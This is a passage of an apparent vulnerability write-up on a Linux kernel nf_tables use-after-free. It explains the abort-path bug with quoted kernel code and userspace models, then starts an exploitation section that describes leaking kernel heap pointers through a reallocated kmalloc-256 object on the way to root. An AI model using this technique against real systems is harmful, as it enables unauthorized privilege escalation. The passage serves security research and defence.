<span class="nl">err_set_elem_expr:</span>
        <span class="n">nft_expr_destroy</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">expr</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
        <span class="k">return</span> <span class="n">ERR_PTR</span><span class="p">(</span><span class="n">err</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">nf_tables_destroy_set</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span> <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">list_empty</span><span class="p">(</span><span class="o">&amp;</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">bindings</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="n">nft_set_is_anonymous</span><span class="p">(</span><span class="n">set</span><span class="p">))</span>   <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">3</span><span class="p">]</span>
                <span class="n">nft_set_destroy</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">set</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
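<p>The key point here is ordering: the expression’s init side effect (the binding) happens before the stateful check, and the error path does not undo it. A minimal userspace sketch of that ordering follows. All names in it (<code class="language-plaintext highlighter-rouge">model_set</code>, <code class="language-plaintext highlighter-rouge">model_expr_type</code>, <code class="language-plaintext highlighter-rouge">model_set_elem_expr_alloc</code>, <code class="language-plaintext highlighter-rouge">MODEL_EXPR_STATEFUL</code>, <code class="language-plaintext highlighter-rouge">MODEL_EOPNOTSUPP</code>) are hypothetical stand-ins, and the bindings list is assumed to be reducible to a counter.</p>

```c
#include <assert.h>
#include <stdbool.h>

/* Hypothetical stand-ins; values and names are NOT taken from the kernel. */
#define MODEL_EXPR_STATEFUL 0x1u   /* stand-in for NFT_EXPR_STATEFUL */
#define MODEL_EOPNOTSUPP    95     /* stand-in for EOPNOTSUPP */

struct model_set {
    bool anonymous;
    int  nbindings;                /* stand-in for the set's bindings list */
    bool destroyed;
};

struct model_expr_type {
    unsigned int flags;
};

/* Init side effect of an objref_map-like expression: bind the set. */
static void model_expr_init(struct model_set *set)
{
    set->nbindings++;
}

/*
 * Destroy path: tears the set down only if it is anonymous and has no
 * bindings left. Note that it does not remove the binding itself.
 */
static void model_expr_destroy(struct model_set *set)
{
    if (set->nbindings == 0 && set->anonymous)
        set->destroyed = true;
}

/* Returns 0 on success or a negative errno-style value on failure. */
static int model_set_elem_expr_alloc(const struct model_expr_type *type,
                                     struct model_set *set)
{
    model_expr_init(set);                  /* side effects happen first */

    if (!(type->flags & MODEL_EXPR_STATEFUL)) {
        model_expr_destroy(set);           /* error path keeps the binding */
        return -MODEL_EOPNOTSUPP;
    }
    return 0;
}
```

<p>Calling <code class="language-plaintext highlighter-rouge">model_set_elem_expr_alloc</code> with a type that lacks the stateful flag returns an error, yet the set is left with one binding and is not destroyed. That leftover state is what the abort path runs into next.</p>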

<p>Ultimately, the failure propagates back to <code class="language-plaintext highlighter-rouge">nfnetlink_rcv_batch</code>, and since processing of the batch failed somewhere along the way, <code class="language-plaintext highlighter-rouge">nf_tables_abort</code> is called (detailed at the start of this section). <code class="language-plaintext highlighter-rouge">nf_tables_abort</code> calls <code class="language-plaintext highlighter-rouge">__nf_tables_abort</code>, which processes every <code class="language-plaintext highlighter-rouge">nft_trans</code> in the <code class="language-plaintext highlighter-rouge">nft_net-&gt;commit_list</code> in reverse order. At this point there are two <code class="language-plaintext highlighter-rouge">nft_trans</code> entries: one from creating the new <code class="language-plaintext highlighter-rouge">nft_object</code>, and one from creating the <code class="language-plaintext highlighter-rouge">nft_set_elem</code> that references it. The <code class="language-plaintext highlighter-rouge">nft_set_elem</code> entry is therefore processed first, then the <code class="language-plaintext highlighter-rouge">nft_object</code> entry. Because the <code class="language-plaintext highlighter-rouge">nft_set_elem</code> was bound earlier, its <code class="language-plaintext highlighter-rouge">nft_trans</code> is simply destroyed [1][1A] with no further processing. The <code class="language-plaintext highlighter-rouge">nft_object</code> is not an existing object being updated, so its handler just decrements the use count of the table the object belongs to and calls <code class="language-plaintext highlighter-rouge">nft_obj_del</code> [2]. <code class="language-plaintext highlighter-rouge">nft_obj_del</code> removes the object from the <code class="language-plaintext highlighter-rouge">rhltable</code> that it belongs to and unlinks it from the RCU linked list it is on [2A], but does not free the object.
Finally, <code class="language-plaintext highlighter-rouge">nf_tables_abort_release</code> [3] is called for every <code class="language-plaintext highlighter-rouge">nft_trans</code> still remaining in the <code class="language-plaintext highlighter-rouge">nft_net-&gt;commit_list</code>. Only one <code class="language-plaintext highlighter-rouge">nft_trans</code> remains at that point: the one for the <code class="language-plaintext highlighter-rouge">nft_object</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">__nf_tables_abort</span><span class="p">(</span><span class="k">struct</span> <span class="n">net</span> <span class="o">*</span><span class="n">net</span><span class="p">,</span> <span class="k">enum</span> <span class="n">nfnl_abort_action</span> <span class="n">action</span><span class="p">)</span>
<span class="p">{</span>
        <span class="p">...</span>
        <span class="n">list_for_each_entry_safe_reverse</span><span class="p">(</span><span class="n">trans</span><span class="p">,</span> <span class="n">next</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">nft_net</span><span class="o">-&gt;</span><span class="n">commit_list</span><span class="p">,</span>
                                         <span class="n">list</span><span class="p">)</span> <span class="p">{</span>
                <span class="k">switch</span> <span class="p">(</span><span class="n">trans</span><span class="o">-&gt;</span><span class="n">msg_type</span><span class="p">)</span> <span class="p">{</span>
                <span class="k">case</span> <span class="n">NFT_MSG_NEWSETELEM</span><span class="p">:</span>
                        <span class="k">if</span> <span class="p">(</span><span class="n">nft_trans_elem_set_bound</span><span class="p">(</span><span class="n">trans</span><span class="p">))</span> <span class="p">{</span>
                                <span class="n">nft_trans_destroy</span><span class="p">(</span><span class="n">trans</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
                                <span class="k">break</span><span class="p">;</span>
                        <span class="p">}</span>
                        <span class="n">te</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">nft_trans_elem</span> <span class="o">*</span><span class="p">)</span><span class="n">trans</span><span class="o">-&gt;</span><span class="n">data</span><span class="p">;</span>
                        <span class="n">nft_setelem_remove</span><span class="p">(</span><span class="n">net</span><span class="p">,</span> <span class="n">te</span><span class="o">-&gt;</span><span class="n">set</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">te</span><span class="o">-&gt;</span><span class="n">elem</span><span class="p">);</span>
                        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">nft_setelem_is_catchall</span><span class="p">(</span><span class="n">te</span><span class="o">-&gt;</span><span class="n">set</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">te</span><span class="o">-&gt;</span><span class="n">elem</span><span class="p">))</span>
                                <span class="n">atomic_dec</span><span class="p">(</span><span class="o">&amp;</span><span class="n">te</span><span class="o">-&gt;</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">nelems</span><span class="p">);</span>
                        <span class="k">break</span><span class="p">;</span>
                <span class="p">...</span>
                <span class="k">case</span> <span class="n">NFT_MSG_NEWOBJ</span><span class="p">:</span>
                        <span class="k">if</span> <span class="p">(</span><span class="n">nft_trans_obj_update</span><span class="p">(</span><span class="n">trans</span><span class="p">))</span> <span class="p">{</span>
                                <span class="n">nft_obj_destroy</span><span class="p">(</span><span class="o">&amp;</span><span class="n">trans</span><span class="o">-&gt;</span><span class="n">ctx</span><span class="p">,</span>
                                                <span class="n">nft_trans_obj_newobj</span><span class="p">(</span><span class="n">trans</span><span class="p">));</span>
                                <span class="n">nft_trans_destroy</span><span class="p">(</span><span class="n">trans</span><span class="p">);</span>
                        <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
                                <span class="n">trans</span><span class="o">-&gt;</span><span class="n">ctx</span><span class="p">.</span><span class="n">table</span><span class="o">-&gt;</span><span class="n">use</span><span class="o">--</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
                                <span class="n">nft_obj_del</span><span class="p">(</span><span class="n">nft_trans_obj</span><span class="p">(</span><span class="n">trans</span><span class="p">));</span>
                        <span class="p">}</span>
                        <span class="k">break</span><span class="p">;</span>
                <span class="p">...</span>
                <span class="p">}</span>
        <span class="p">}</span>
        <span class="n">list_for_each_entry_safe_reverse</span><span class="p">(</span><span class="n">trans</span><span class="p">,</span> <span class="n">next</span><span class="p">,</span>
                                         <span class="o">&amp;</span><span class="n">nft_net</span><span class="o">-&gt;</span><span class="n">commit_list</span><span class="p">,</span> <span class="n">list</span><span class="p">)</span> <span class="p">{</span>
                <span class="n">list_del</span><span class="p">(</span><span class="o">&amp;</span><span class="n">trans</span><span class="o">-&gt;</span><span class="n">list</span><span class="p">);</span>
                <span class="n">nf_tables_abort_release</span><span class="p">(</span><span class="n">trans</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">3</span><span class="p">]</span>
        <span class="p">}</span>
        <span class="p">...</span>
        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">void</span> <span class="nf">nft_obj_del</span><span class="p">(</span><span class="k">struct</span> <span class="n">nft_object</span> <span class="o">*</span><span class="n">obj</span><span class="p">)</span>   <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="n">A</span><span class="p">]</span>
<span class="p">{</span>
        <span class="n">rhltable_remove</span><span class="p">(</span><span class="o">&amp;</span><span class="n">nft_objname_ht</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">obj</span><span class="o">-&gt;</span><span class="n">rhlhead</span><span class="p">,</span> <span class="n">nft_objname_ht_params</span><span class="p">);</span>
        <span class="n">list_del_rcu</span><span class="p">(</span><span class="o">&amp;</span><span class="n">obj</span><span class="o">-&gt;</span><span class="n">list</span><span class="p">);</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">void</span> <span class="nf">nft_trans_destroy</span><span class="p">(</span><span class="k">struct</span> <span class="n">nft_trans</span> <span class="o">*</span><span class="n">trans</span><span class="p">)</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="n">A</span><span class="p">]</span>
<span class="p">{</span>
        <span class="n">list_del</span><span class="p">(</span><span class="o">&amp;</span><span class="n">trans</span><span class="o">-&gt;</span><span class="n">list</span><span class="p">);</span>
        <span class="n">kfree</span><span class="p">(</span><span class="n">trans</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
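<p>The two passes of the abort path can be sketched in userspace as follows. This is a simplified model under my own assumptions, not the kernel implementation: every name (<code class="language-plaintext highlighter-rouge">model_obj</code>, <code class="language-plaintext highlighter-rouge">model_elem</code>, <code class="language-plaintext highlighter-rouge">model_trans</code>, <code class="language-plaintext highlighter-rouge">model_abort</code>, <code class="language-plaintext highlighter-rouge">model_elem_dangles</code>) is hypothetical, the commit list is an array, and freeing is represented by a flag so that the sketch itself never touches freed memory. The second pass marks the object freed, standing in for what <code class="language-plaintext highlighter-rouge">nf_tables_abort_release</code> does for <code class="language-plaintext highlighter-rouge">NFT_MSG_NEWOBJ</code>.</p>

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical userspace stand-ins; these are NOT the kernel definitions. */
enum model_msg { MODEL_NEWOBJ, MODEL_NEWSETELEM };

struct model_obj {
    bool linked;                 /* still reachable by name lookup */
    bool freed;                  /* flag instead of a real free() */
};

struct model_elem {
    struct model_obj *obj;       /* object this set element references */
    bool in_set;
};

struct model_trans {
    enum model_msg msg_type;
    bool live;                   /* false once the transaction is destroyed */
    bool bound;                  /* only meaningful for MODEL_NEWSETELEM */
    struct model_obj *obj;       /* used by MODEL_NEWOBJ */
    struct model_elem *elem;     /* used by MODEL_NEWSETELEM */
};

static void model_abort(struct model_trans *commit, size_t n)
{
    /* Pass 1: undo each transaction, newest first. */
    for (size_t i = n; i-- > 0; ) {
        struct model_trans *t = &commit[i];

        switch (t->msg_type) {
        case MODEL_NEWSETELEM:
            if (t->bound) {
                t->live = false;         /* destroyed, element left alone */
                break;
            }
            t->elem->in_set = false;     /* normal undo: remove the element */
            break;
        case MODEL_NEWOBJ:
            t->obj->linked = false;      /* unlinked, but not freed yet */
            break;
        }
    }

    /* Pass 2: release every transaction that is still on the list. */
    for (size_t i = n; i-- > 0; ) {
        struct model_trans *t = &commit[i];

        if (!t->live)
            continue;
        if (t->msg_type == MODEL_NEWOBJ)
            t->obj->freed = true;        /* stands in for freeing the object */
        t->live = false;                 /* element cleanup is omitted here */
    }
}

/* True when an element that is still in a set points at a freed object. */
static bool model_elem_dangles(const struct model_elem *e)
{
    return e->in_set && e->obj != NULL && e->obj->freed;
}
```

<p>Running <code class="language-plaintext highlighter-rouge">model_abort</code> over an object transaction plus a bound set elem transaction leaves the element in the set while its object is marked freed, so <code class="language-plaintext highlighter-rouge">model_elem_dangles</code> reports true. With the same input but the set elem not bound, the element is removed in the first pass and nothing dangles.</p>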
<p>In <code class="language-plaintext highlighter-rouge">nf_tables_abort_release</code>, <code class="language-plaintext highlighter-rouge">nft_obj_destroy</code> is called on the <code class="language-plaintext highlighter-rouge">nft_object</code> [1] that the <code class="language-plaintext highlighter-rouge">nft_trans</code> is referencing, which frees the object [2]. However, the <code class="language-plaintext highlighter-rouge">nft_set_elem</code> that holds a pointer to the object was never removed: because the set elem was bound, its <code class="language-plaintext highlighter-rouge">nft_trans</code> was destroyed earlier without undoing the element. The set elem therefore still points at freed memory, which gives us a use-after-free condition that we can leverage for further exploitation.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">nf_tables_abort_release</span><span class="p">(</span><span class="k">struct</span> <span class="n">nft_trans</span> <span class="o">*</span><span class="n">trans</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">switch</span> <span class="p">(</span><span class="n">trans</span><span class="o">-&gt;</span><span class="n">msg_type</span><span class="p">)</span> <span class="p">{</span>
        <span class="p">...</span>
        <span class="k">case</span> <span class="n">NFT_MSG_NEWOBJ</span><span class="p">:</span>
                <span class="n">nft_obj_destroy</span><span class="p">(</span><span class="o">&amp;</span><span class="n">trans</span><span class="o">-&gt;</span><span class="n">ctx</span><span class="p">,</span> <span class="n">nft_trans_obj</span><span class="p">(</span><span class="n">trans</span><span class="p">));</span>     <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
                <span class="k">break</span><span class="p">;</span>
        <span class="p">...</span>
        <span class="p">}</span>
        <span class="n">kfree</span><span class="p">(</span><span class="n">trans</span><span class="p">);</span>
<span class="p">}</span>

<span class="cp">#define nft_trans_obj(trans)    \
        (((struct nft_trans_obj *)trans-&gt;data)-&gt;obj)
</span>
<span class="k">static</span> <span class="kt">void</span> <span class="nf">nft_obj_destroy</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span> <span class="k">struct</span> <span class="n">nft_object</span> <span class="o">*</span><span class="n">obj</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">obj</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">destroy</span><span class="p">)</span>
                <span class="n">obj</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">destroy</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">obj</span><span class="p">);</span>

        <span class="n">module_put</span><span class="p">(</span><span class="n">obj</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">type</span><span class="o">-&gt;</span><span class="n">owner</span><span class="p">);</span>
        <span class="n">kfree</span><span class="p">(</span><span class="n">obj</span><span class="o">-&gt;</span><span class="n">key</span><span class="p">.</span><span class="n">name</span><span class="p">);</span>
        <span class="n">kfree</span><span class="p">(</span><span class="n">obj</span><span class="o">-&gt;</span><span class="n">udata</span><span class="p">);</span>
        <span class="n">kfree</span><span class="p">(</span><span class="n">obj</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
<span class="p">}</span>
</code></pre></div></div>

<h1 id="exploitation">Exploitation</h1>

<p>This section will detail how the use-after-free can be leveraged to escalate privileges from an unprivileged user to root.</p>

<p>The freed <code class="language-plaintext highlighter-rouge">nft_object</code> is still referenced from an <code class="language-plaintext highlighter-rouge">nft_set_elem</code>, so leaking data through the freed memory is limited to <code class="language-plaintext highlighter-rouge">nf_tables_getsetelem</code>, which we can trigger by sending a netlink message of type <code class="language-plaintext highlighter-rouge">NFT_MSG_GETSETELEM</code>. This function eventually calls <code class="language-plaintext highlighter-rouge">nf_tables_fill_setelem</code>, which passes the <code class="language-plaintext highlighter-rouge">nft_object</code>’s <code class="language-plaintext highlighter-rouge">key.name</code> member to <code class="language-plaintext highlighter-rouge">nla_put_string</code>. The result is a memcpy of <code class="language-plaintext highlighter-rouge">strlen + 1</code> bytes from whatever <code class="language-plaintext highlighter-rouge">key.name</code> is pointing to [1], and the copied data is returned to the user.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">nf_tables_getsetelem</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span>
                                <span class="k">const</span> <span class="k">struct</span> <span class="n">nfnl_info</span> <span class="o">*</span><span class="n">info</span><span class="p">,</span>
                                <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span> <span class="k">const</span> <span class="n">nla</span><span class="p">[])</span>
<span class="p">{</span>
        <span class="p">...</span>
        <span class="n">nla_for_each_nested</span><span class="p">(</span><span class="n">attr</span><span class="p">,</span> <span class="n">nla</span><span class="p">[</span><span class="n">NFTA_SET_ELEM_LIST_ELEMENTS</span><span class="p">],</span> <span class="n">rem</span><span class="p">)</span> <span class="p">{</span>
                <span class="n">err</span> <span class="o">=</span> <span class="n">nft_get_set_elem</span><span class="p">(</span><span class="o">&amp;</span><span class="n">ctx</span><span class="p">,</span> <span class="n">set</span><span class="p">,</span> <span class="n">attr</span><span class="p">);</span>
                <span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
                        <span class="k">break</span><span class="p">;</span>
        <span class="p">}</span>
        <span class="p">...</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">int</span> <span class="nf">nf_tables_fill_setelem</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span>
                                  <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">,</span>
                                  <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set_elem</span> <span class="o">*</span><span class="n">elem</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set_ext</span> <span class="o">*</span><span class="n">ext</span> <span class="o">=</span> <span class="n">nft_set_elem_ext</span><span class="p">(</span><span class="n">set</span><span class="p">,</span> <span class="n">elem</span><span class="o">-&gt;</span><span class="n">priv</span><span class="p">);</span>
        <span class="p">...</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">nft_set_ext_exists</span><span class="p">(</span><span class="n">ext</span><span class="p">,</span> <span class="n">NFT_SET_EXT_OBJREF</span><span class="p">)</span> <span class="o">&amp;&amp;</span>
            <span class="n">nla_put_string</span><span class="p">(</span><span class="n">skb</span><span class="p">,</span> <span class="n">NFTA_SET_ELEM_OBJREF</span><span class="p">,</span>
                           <span class="p">(</span><span class="o">*</span><span class="n">nft_set_ext_obj</span><span class="p">(</span><span class="n">ext</span><span class="p">))</span><span class="o">-&gt;</span><span class="n">key</span><span class="p">.</span><span class="n">name</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
                <span class="k">goto</span> <span class="n">nla_put_failure</span><span class="p">;</span>
        <span class="p">...</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kr">inline</span> <span class="kt">int</span> <span class="nf">nla_put_string</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span> <span class="kt">int</span> <span class="n">attrtype</span><span class="p">,</span>
                                 <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">str</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">return</span> <span class="n">nla_put</span><span class="p">(</span><span class="n">skb</span><span class="p">,</span> <span class="n">attrtype</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">str</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="n">str</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">int</span> <span class="nf">nla_put</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span> <span class="kt">int</span> <span class="n">attrtype</span><span class="p">,</span> <span class="kt">int</span> <span class="n">attrlen</span><span class="p">,</span> <span class="k">const</span> <span class="kt">void</span> <span class="o">*</span><span class="n">data</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">skb_tailroom</span><span class="p">(</span><span class="n">skb</span><span class="p">)</span> <span class="o">&lt;</span> <span class="n">nla_total_size</span><span class="p">(</span><span class="n">attrlen</span><span class="p">)))</span>
                <span class="k">return</span> <span class="o">-</span><span class="n">EMSGSIZE</span><span class="p">;</span>

        <span class="n">__nla_put</span><span class="p">(</span><span class="n">skb</span><span class="p">,</span> <span class="n">attrtype</span><span class="p">,</span> <span class="n">attrlen</span><span class="p">,</span> <span class="n">data</span><span class="p">);</span>
        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">__nla_put</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span> <span class="kt">int</span> <span class="n">attrtype</span><span class="p">,</span> <span class="kt">int</span> <span class="n">attrlen</span><span class="p">,</span>
               <span class="k">const</span> <span class="kt">void</span> <span class="o">*</span><span class="n">data</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span><span class="n">nla</span><span class="p">;</span>

        <span class="n">nla</span> <span class="o">=</span> <span class="n">__nla_reserve</span><span class="p">(</span><span class="n">skb</span><span class="p">,</span> <span class="n">attrtype</span><span class="p">,</span> <span class="n">attrlen</span><span class="p">);</span>
        <span class="n">memcpy</span><span class="p">(</span><span class="n">nla_data</span><span class="p">(</span><span class="n">nla</span><span class="p">),</span> <span class="n">data</span><span class="p">,</span> <span class="n">attrlen</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>So when another object gets allocated into the freed memory location, whatever is at the offset of the <code class="language-plaintext highlighter-rouge">nft_object</code>’s <code class="language-plaintext highlighter-rouge">key.name</code> member is treated as the source pointer for the memcpy, leaking the data at that location. The <code class="language-plaintext highlighter-rouge">key.name</code> member is at offset 32 of the <code class="language-plaintext highlighter-rouge">nft_object</code>, and the <code class="language-plaintext highlighter-rouge">nft_object</code> is allocated from the kmalloc-256 slab.</p>
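
<p>To make the primitive concrete, here is a minimal user-space sketch of the stale read (it is not kernel code). The names <code class="language-plaintext highlighter-rouge">SLOT_SIZE</code>, <code class="language-plaintext highlighter-rouge">KEY_NAME_OFFSET</code> and <code class="language-plaintext highlighter-rouge">leak_via_key_name</code> are hypothetical; only the offset 32, the 256-byte slot and the <code class="language-plaintext highlighter-rouge">strlen + 1</code> length rule come from the code above.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define SLOT_SIZE        256  /* kmalloc-256 slot that held the nft_object */
#define KEY_NAME_OFFSET  32   /* offset of key.name inside nft_object */

/*
 * Model of the stale read: interpret the bytes at KEY_NAME_OFFSET of the
 * reused slot as a string pointer and copy strlen + 1 bytes from it.
 * Returns the number of bytes copied, or 0 if they do not fit in out.
 */
static size_t leak_via_key_name(const unsigned char *slot,
                                unsigned char *out, size_t out_len)
{
        const char *src;
        size_t len;

        assert(slot != NULL && out != NULL);

        /* memcpy avoids unaligned or type-punned pointer loads. */
        memcpy(&src, slot + KEY_NAME_OFFSET, sizeof(src));

        len = strlen(src) + 1;  /* same length rule as nla_put_string */
        if (len > out_len)
                return 0;

        memcpy(out, src, len);
        return len;
}
```

<p>Because the copy length comes from <code class="language-plaintext highlighter-rouge">strlen</code>, the read stops at the first zero byte, so leaked data that contains a zero byte comes back truncated.</p>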

<h2 id="leaking-the-address-of-an-nft_set">Leaking the address of an <code class="language-plaintext highlighter-rouge">nft_set</code></h2>

<p>One way to leak an initial memory address from a heap object is to craft an <code class="language-plaintext highlighter-rouge">nft_rule</code> that is large enough to be allocated with kmalloc-256. An <code class="language-plaintext highlighter-rouge">nft_rule</code> can contain multiple <code class="language-plaintext highlighter-rouge">nft_expr</code> that are specified when creating the rule. The rule attributes take up 24 bytes (not counting the expressions and userdata the rule contains), and the rule has the following layout.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>+ ------------------------------------------------------------------------------------ +
| Rule attributes (24 bytes) | nft_expr #1 | nft_expr #2 | other exprs | Rule USERDATA |
+ ------------------------------------------------------------------------------------ +
</code></pre></div></div>

<p>Since offset 32 from the start of the rule is treated as the source pointer for the leak and the rule attributes occupy the first 24 bytes, the pointer is read from offset 8 of the first <code class="language-plaintext highlighter-rouge">nft_expr</code> of the rule (24 + 8 = 32). This is the data member of the expression.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_expr</span> <span class="p">{</span>
        <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_expr_ops</span> <span class="o">*</span><span class="n">ops</span><span class="p">;</span>
        <span class="kt">unsigned</span> <span class="kt">char</span>           <span class="n">data</span><span class="p">[]</span>
                <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="n">__alignof__</span><span class="p">(</span><span class="n">u64</span><span class="p">))));</span>
<span class="p">};</span>
</code></pre></div></div>
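
<p>The offset arithmetic can be checked with a small sketch. <code class="language-plaintext highlighter-rouge">struct mock_expr</code> and <code class="language-plaintext highlighter-rouge">first_expr_data_offset</code> are hypothetical stand-ins, the 24-byte header size is taken from the text rather than from a real <code class="language-plaintext highlighter-rouge">nft_rule</code> definition, and a 64-bit build is assumed.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define RULE_HEADER_SIZE 24  /* rule attributes, as stated in the text */
#define KEY_NAME_OFFSET  32  /* offset the stale read dereferences */

/* Stand-in for struct nft_expr: one pointer followed by expression data. */
struct mock_expr {
        const void    *ops;
        unsigned char  data[]
                __attribute__((aligned(__alignof__(uint64_t))));
};

/* Offset, from the start of the rule, of the first expression's data. */
static size_t first_expr_data_offset(void)
{
        /* The sketch assumes 8-byte pointers (64-bit layout). */
        assert(sizeof(void *) == 8);

        return RULE_HEADER_SIZE + offsetof(struct mock_expr, data);
}
```

<p>Under those assumptions, <code class="language-plaintext highlighter-rouge">first_expr_data_offset()</code> equals <code class="language-plaintext highlighter-rouge">KEY_NAME_OFFSET</code>, which is why the first expression’s data is what gets dereferenced.</p>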

<p>If the first <code class="language-plaintext highlighter-rouge">nft_expr</code> added to the rule is an <code class="language-plaintext highlighter-rouge">objref_map</code> expr, the data member is a <code class="language-plaintext highlighter-rouge">struct nft_objref_map</code>, which starts with a pointer to an <code class="language-plaintext highlighter-rouge">nft_set</code> [1]. So when the leak is performed, we are leaking whatever is in the <code class="language-plaintext highlighter-rouge">struct list_head</code> [2] at the beginning of the set, which turns out to be a pointer to the next <code class="language-plaintext highlighter-rouge">list_head</code> in the list (these are just nodes in a linked list of <code class="language-plaintext highlighter-rouge">nft_set</code>s).</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_objref_map</span> <span class="p">{</span>
        <span class="k">struct</span> <span class="n">nft_set</span>          <span class="o">*</span><span class="n">set</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
        <span class="n">u8</span>                      <span class="n">sreg</span><span class="p">;</span>
        <span class="k">struct</span> <span class="n">nft_set_binding</span>  <span class="n">binding</span><span class="p">;</span>
<span class="p">};</span>


<span class="k">struct</span> <span class="n">nft_set</span> <span class="p">{</span>
        <span class="k">struct</span> <span class="n">list_head</span>        <span class="n">list</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
        <span class="k">struct</span> <span class="n">list_head</span>        <span class="n">bindings</span><span class="p">;</span>
        <span class="k">struct</span> <span class="n">nft_table</span>        <span class="o">*</span><span class="n">table</span><span class="p">;</span>
        <span class="n">possible_net_t</span>          <span class="n">net</span><span class="p">;</span>
        <span class="kt">char</span>                    <span class="o">*</span><span class="n">name</span><span class="p">;</span>
